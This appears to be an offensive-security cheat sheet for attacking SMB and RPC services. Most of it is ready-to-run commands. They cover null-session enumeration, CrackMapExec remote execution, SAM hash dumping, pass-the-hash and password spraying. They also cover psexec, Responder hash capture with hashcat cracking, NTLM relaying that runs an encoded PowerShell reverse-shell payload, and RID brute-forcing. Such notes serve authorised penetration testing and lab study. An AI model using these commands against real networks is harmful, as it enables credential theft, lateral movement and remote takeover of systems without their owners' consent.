SMB, RPC - 137,138,139,445,111
SMBclient
# Connecting to the Share by starting a null session or like anonymous access
smbclient -N -L //ip
# login with no user/pass and get prompt for further enum
smbclient //ip/notes
# login with valid user and pass
smbclient -U 'user%pass' //ip/new-site
# Downloading a file
get filename
# Run system commands using !<cmd>
!ls
!cat something
# Checking connections to samba
smbstatusNmap SMB scripts
# Nmap scanning for smb
nmap ip -sV -sC -p139,445
# Vulnerabilties nmap scan
nmap -p445 --script smb-vuln-* <target> RPCclient
# nmap script scan
nmap -sV -p 111 --script=rpcinfo $RHOST
# If you find NFS-related services, enumerate those.
nmap -p 111 --script nfs* $RHOST
# Connecting to smbserver
rpcclient -U "" ipSome comand to get information :
----------------------- RPCclient Enumeration -------------------------
# Server information
srvinfo
# Enumerate all domains that are deployed in the network.
enumdomains
# Provides domain, server, and user information of deployed domains
querydominfo
# Enumerates all available shares.
netshareenumall
# Provides information about a specific share.
netsharetargetinfo <share>
----------------------- RPCclient User Enumeration ------------------------
# Enumerates all domain users.
enumdomusers
# Provides information about a specific user.
queryuser <RID>
----------------------- RPCclient Group Enumeration -----------------------
# Enumerates all domain groups.
enumdomgroups
# it provide info about group with given RID
querygroup 0x201
# Enumerate group member using id
querygroupmem 0x200SMBmap
# Link : <https://github.com/ShawnDEvans/smbmap>
smbmap -H ip
smbmap -H ip -u eren
smbmap -R directory -H ip
smbmap -R directory -H ip -A Groups.xml -q
smbmap -d active.htb -u user -p password -H ip -R Users
smbmap -H ip --download "notes\\note.txt"
smbmap -H ip --upload test.txt "notes\\test.txt"CrackMapExec
# Link : <https://github.com/Porchetta-Industries/CrackMapExec>
crackmapexec smb ip --shares -u '' -p ''
# To execute commands remotely
crackmapexec smb ip -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
# Enumerating Logged-on Users
crackmapexec smb 10.10.10.0/24 -u administrator -p 'Password123!' --loggedon-users
# Extract Hashes from SAM Database
crackmapexec smb ip -u administrator -p 'Password123!' --sam
# Pass-the-Hash (PtH)
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE
# Password spraying
crackmapexec smb ip -u /tmp/userlist.txt -p 'Company01!' --continue-on-successEnum4linux-ng
# Link : <https://github.com/cddmp/enum4linux-ng>
# Installation
git clone https://github.com/cddmp/enum4linux-ng.git
cd enum4linux-ng
pip3 install -r requirements.txt
# Enumeration
./enum4linux-ng.py ip -A
./enum4linux-ng.py ip -A -CPsExec
# To connect to a remote machine with a local administrator account
impacket-psexec administrator:'Password123!'@ipResponder
# created a fake SMB server using the Responder default configuration
responder -I <interface name>
sudo responder -I ens33
# NetNTLMv2 - Crack the hash using hashcat
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txtCan’t Crack the Hash ?
# impacket-ntlmrelayx
# It will dump SAM database
impacket-ntlmrelayx --no-http-server -smb2support -t ip
# Relaying the hash and executing a command, like reverse shell below base64 encoded
impacket-ntlmrelayx --no-http-server -smb2support -t ip -c 'powershell -e JABj----kA'
# CrackMapExec
# PassTheHash
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FEBrute Forcing User RIDs
# Using command line
for i in $(seq 500 1100);do rpcclient -N -U "" ip -c "queryuser 0x$(printf '%x\\n' $i)" | grep "User Name\\|user_rid\\|group_rid" && echo "";done
# Python Script from Impacket - Samrdump.py
samrdump.py ipLast updated